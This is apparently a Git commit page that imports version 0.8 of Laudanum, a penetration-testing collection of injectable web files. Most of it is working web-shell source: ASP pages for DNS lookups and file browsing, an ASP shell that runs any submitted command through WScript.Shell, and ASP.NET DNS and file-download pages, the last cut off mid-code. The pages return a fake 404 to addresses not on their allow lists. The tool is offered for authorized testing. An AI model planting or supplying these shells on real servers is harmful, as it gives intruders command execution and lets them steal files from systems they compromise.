Commit 16202b4c authored by Devon Kearns's avatar Devon Kearns

Imported Upstream version 0.8

parents
File added
File added
The Team
========================================================
- Kevin Johnson
- Project Lead
- Justin Searle
- Core Developer
- Tim Medin
- Core Developer
- James Jardine
- Core Developer
Additional Coding
========================================================
- Robin Wood
This diff is collapsed.
Laudanum: Injectable Web Exploit Code v0.4
By Kevin Johnson <kjohnson@secureideas.net>
and the Laudanum Development Team
Project Website: http://laudanum.secureideas.net
Sourceforge Site: http://sourceforge.net/projects/laudanum
SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum
-------------------------------------------------------------------------------
** Copyright (C) 2012 Kevin Johnson and the Laudanum Project Team
**
** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by
** the Free Software Foundation; either version 2 of the License, or
** (at your option) any later version.
**
** This program is distributed in the hope that it will be useful,
** but WITHOUT ANY WARRANTY; without even the implied warranty of
** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
** GNU General Public License for more details.
**
** You should have received a copy of the GNU General Public License
** along with this program; if not, write to the Free Software
** Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
-------------------------------------------------------------------------------
I. ABOUT
_____________________________________
Laudanum is a collection of injectable files, designed to be used in a pentest
when upload vulnerabilities, administrative interfaces, and SQL injection flaws
are found. These files are written in multiple languages for different
environments. They provide functionality such as shell, DNS query, LDAP
retrieval and others.
File added
File added
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to DNS on the system.
' *** Written by Tim Medin <timmedin@gmail.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' ***************** Config entries below ***********************
' IPs are enterable as individual addresses TODO: add CIDR support
Dim allowedIPs
Dim allowed
Dim qtypes
Dim qtype
Dim validtype
Dim query
Dim i
Dim command
allowedIPs = "192.168.0.1,127.0.0.1"
' Just in cace you added a space in the line above
allowedIPs = replace(allowedIPS," ","")
'turn it into an array
allowedIPs = split(allowedIPS,",") '
' make sure the ip is allowed
allowed = 0
for i = lbound(allowedIPs) to ubound(allowedIPs)
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
allowed = 1
Exit For
end if
next
' send a 404 if not the allowed IP
if allowed = 0 then
Response.Status = "404 File Not Found"
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
Response.End
end if
%>
<html>
<head>
<title>Laudanum ASP DNS Access</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
document.dns.query.focus();
}
</script>
</head>
<body onload="init()">
<h1>DNS Query 0.1</h1>
<%
' dns query types as defined as by windows nslookup
qtypes = split ("ANY,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV",",")
qtype = UCase(Request.Form("type"))
' see if the query type is valid, if it isn't then set it.
validtype = 0
for i = lbound(qtypes) to ubound(qtypes)
if qtype = qtypes(i) then
validtype = 1
Exit For
end if
next
if validtype = 0 then qtype = "ANY"
%>
<form name="dns" method="POST">
<fieldset>
<legend>DNS Lookup:</legend>
<p>Query:<input name="query" type="text">
Type:<select name="type">
<%
for i = lbound(qtypes) to ubound(qtypes)
if qtype = qtypes(i) then
Response.Write("<option value=""" & qtypes(i) & """ SELECTED>" & qtypes(i) & "</option>")
else
Response.Write("<option value=""" & qtypes(i) & """>" & qtypes(i) & "</option>")
end if
next
%>
</select>
<input type="submit" value="Submit">
</fieldset>
</form>
<%
' get the query
query = trim(Request.Form("query"))
' the query must be sanitized a bit to try to make sure the shell doesn't hang
query = replace(query, " ", "")
query = replace(query, ";", "")
if len(query) > 0 then
command = "nslookup -type=" & qtype & " " & query
Set objWShell = Server.CreateObject("WScript.Shell")
Set objCmd = objWShell.Exec(command)
strPResult = objCmd.StdOut.Readall()
set objCmd = nothing: Set objWShell = nothing
%><pre><%
Response.Write command & "<br>"
Response.Write replace(strPResult,vbCrLf,"<br>")
%></pre><%
end if
%>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
<%@Language="VBScript"%>
<%Option Explicit%>
<%Response.Buffer = True%>
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to the file system.
' *** Written by Tim Medin <timmedin@gmail.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' ***************** Config entries below ***********************
' Define variables
Dim allowedIPs
Dim allowed
Dim filepath
Dim file
Dim stream
Dim path
Dim i
Dim fso
Dim folder
Dim list
Dim temppath
' IPs are enterable as individual addresses TODO: add CIDR support
allowedIPs = "192.168.0.1,127.0.0.1,::1"
' Just in cace you added a space in the line above
allowedIPs = replace(allowedIPS," ","")
'turn it into an array
allowedIPs = split(allowedIPS,",") '
' make sure the ip is allowed
allowed = 0
for i = lbound(allowedIPs) to ubound(allowedIPs)
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
allowed = 1
exit for
end if
next
' send a 404 if the IP Address is not allowed
if allowed = 0 then
Response.Status = "404 File Not Found"
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
Response.End
end if
' create file object for use everywhere
set fso = CreateObject("Scripting.FileSystemObject")
' download a file if selected
filepath = trim(Request.QueryString("file"))
'validate file
if len(filepath) > 0 then
if fso.FileExists(filepath) then
'valid file
Set file = fso.GetFile(filepath)
Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name
'Response.AddHeader "Content-Length", file.Size
Response.ContentType = "application/octet-stream"
set stream = Server.CreateObject("ADODB.Stream")
stream.Open
stream.Type = 1
Response.Charset = "UTF-8"
stream.LoadFromFile(file.Path)
' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb.
Response.BinaryWrite(stream.Read)
stream.Close
set stream = Nothing
set file = Nothing
Response.End
end if
end if
' begin rendering the page
%>
<html>
<head>
<title>Laudanum ASP File Browser</title>
</head>
<body>
<h1>Laudanum File Browser 0.1</h1>
<%
' get the path to work with, if it isn't set or valid then start with the web root
' goofy if statement is used since vbscript doesn't use short-curcuit logic
path = trim(Request.QueryString("path"))
if len(path) = 0 then
path = fso.GetFolder(Server.MapPath("\"))
elseif not fso.FolderExists(path) then
path = fso.GetFolder(Server.MapPath("\"))
end if
set folder = fso.GetFolder(path)
' Special locations, webroot and drives
%><b>Other Locations:</b> <%
for each i in fso.Drives
if i.IsReady then
%><a href="<%=Request.ServerVariables("URL") & "?path=" & i.DriveLetter%>:\"><%=i.DriveLetter%>:</a>&nbsp;&nbsp;<%
end if
next
%><a href="<%=Request.ServerVariables("URL")%>">web root</a><br/><%
' Information on folder
%><h2>Listing of: <%
list = split(folder.path, "\")
temppath = ""
for each i in list
temppath = temppath & i & "\"
%><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(temppath)%>"><%=i%>\</a> <%
next
%></h2><%
' build table for listing
%><table>
<tr><th align="left">Name</th><th>Size</th><th>Modified</th><th>Accessed</th><th>Created</th></tr><%
' Parent Path if it exists
if not folder.IsRootFolder then
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(folder.ParentFolder.Path)%>">..</a></td><%
end if
' Get the folders
set list = folder.SubFolders
for each i in list
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(i.Path)%>"><%=i.Name%>\</a></td></tr><%
next
' Get the files
set list = folder.Files
for each i in list
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?file=" & Server.URLEncode(i.Path)%>"><%=i.Name%></a></td><td align="right"><%=FormatNumber(i.Size, 0)%></td><td align="right"><%=i.DateLastModified%></td><td align="right"><%=i.DateLastAccessed%></td><td align="right"><%=i.DateCreated%></td></tr><%
next
' all done
%>
</table>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
This diff is collapsed.
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' can set this to 0 for never time out but don't want to kill the server if a script
' goes into a loop for any reason
Server.ScriptTimeout = 180
ip=request.ServerVariables("REMOTE_ADDR")
if ip<>"1.2.3.4" then
response.Status="404 Page Not Found"
response.Write(response.Status)
response.End
end if
if Request.Form("submit") <> "" then
Dim wshell, intReturn, strPResult
cmd = Request.Form("cmd")
Response.Write ("Running command: " & cmd & "<br />")
set wshell = CreateObject("WScript.Shell")
Set objCmd = wShell.Exec(cmd)
strPResult = objCmd.StdOut.Readall()
response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
set wshell = nothing
end if
%>
<html>
<head><title>Laundanum ASP Shell</title></head>
<body onload="document.shell.cmd.focus()">
<form action="shell.asp" method="POST" name="shell">
Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
<input type="submit" name="submit" value="Submit" />
<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
<p>Example command to do a directory listing:<br>
%ComSpec% /c dir
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
File added
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<html><head><title>Laudanum - DNS</title></head><body>
<script runat="server">
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.com
*** laudanum@secureideas.com
***
*** Project Leads:
*** Kevin Johnson <kevin@secureideas.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides shell access to DNS on the system.
*** Written by James Jardine <james@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
// ********************* Config entries below ***********************************
// IPs are enterable as individual addresses
string[] allowedIPs = new string[3] { "::1", "192.168.1.1", "127.0.0.1" };
// ***************** No editable content below this line **************************
string stdout = "";
string stderr = "";
string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(',');
void die() {
//HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End();
}
void Page_Load(object sender, System.EventArgs e) {
// check if the X-Fordarded-For header exits
string remoteIp;
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
remoteIp = Request.UserHostAddress;
} else {
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
}
bool validIp = false;
foreach (string ip in allowedIPs) {
validIp = (validIp || (remoteIp == ip));
}
if (!validIp) {
die();
}
string qType = "Any";
bool validType = false;
if (Request.Form["type"] != null)
{
qType = Request.Form["type"].ToString();
foreach (string s in qtypes)
{
if (s == qType)
{
validType = true;
break;
}
}
if (!validType)
qType = "Any";
}
if (Request.Form["query"] != null)
{
string query = Request.Form["query"].Replace(" ", string.Empty).Replace(" ", string.Empty);
if(query.Length > 0)
{
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query);
// The following commands are needed to redirect the standard output and standard error.
procStartInfo.RedirectStandardOutput = true;
procStartInfo.RedirectStandardError = true;
procStartInfo.UseShellExecute = false;
// Do not create the black window.
procStartInfo.CreateNoWindow = true;
// Now we create a process, assign its ProcessStartInfo and start it
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
// Get the output and error into a string
stdout = p.StandardOutput.ReadToEnd();
stderr = p.StandardError.ReadToEnd();
}
}
}
</script>
<form method="post">
QUERY: <input type="text" name="query"/><br />
Type: <select name="type">
<%
foreach (string s in qtypes)
{
Response.Write("<option value=\"" + s + "\">" + s + "</option>");
}
%>
</select>
<input type="submit"><br/>
STDOUT:<br/>
<pre><% = stdout.Replace("<", "&lt;") %></pre>
<br/>
<br/>
<br/>
STDERR:<br/>
<pre><% = stderr.Replace("<", "&lt;") %></pre>
</body>
</html>
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<html><head><title>Laudanum - File</title></head><body>
<script runat="server">
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.com
*** laudanum@secureideas.com
***
*** Project Leads:
*** Kevin Johnson <kevin@secureideas.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file allows browsing of the file system
*** Written by James Jardine <james@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
********************************************************************************* */
// ********************* Config entries below ***********************************
// IPs are enterable as individual addresses
string[] allowedIPs = new string[3] {"::1", "192.168.1.1","127.0.0.1"};
// ***************** No editable content below this line **************************
bool allowed = false;
string dir = "";
string file = "";
void Page_Load(object sender, System.EventArgs e)
{
foreach (string ip in allowedIPs)
{
if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip)
{
allowed = true;
}
}
if (!allowed)
{
die();
}
//dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory;
dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath(".");
file = Request.QueryString["file"] != null ? Request.QueryString["file"] : "";
if (file.Length > 0)
{
if (System.IO.File.Exists(file))
{
writefile();
}
}
}
void writefile()
{
Response.ClearContent();
Response.Clear();
Response.ContentType = "text/plain";
//Uncomment the next line if you would prefer to download the file vs display it.
//Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";");
Response.TransmitFile(file);
Response.Flush();
Response.End();
}
void die() {
//HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End();
}
</script>
<html>
<head></head>
<% string[] breadcrumbs = dir.Split('\\');
string breadcrumb = "";
foreach (string b in breadcrumbs)
{
if (b.Length > 0)
{
breadcrumb += b + "\\";
Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>");
Response.Write(" / ");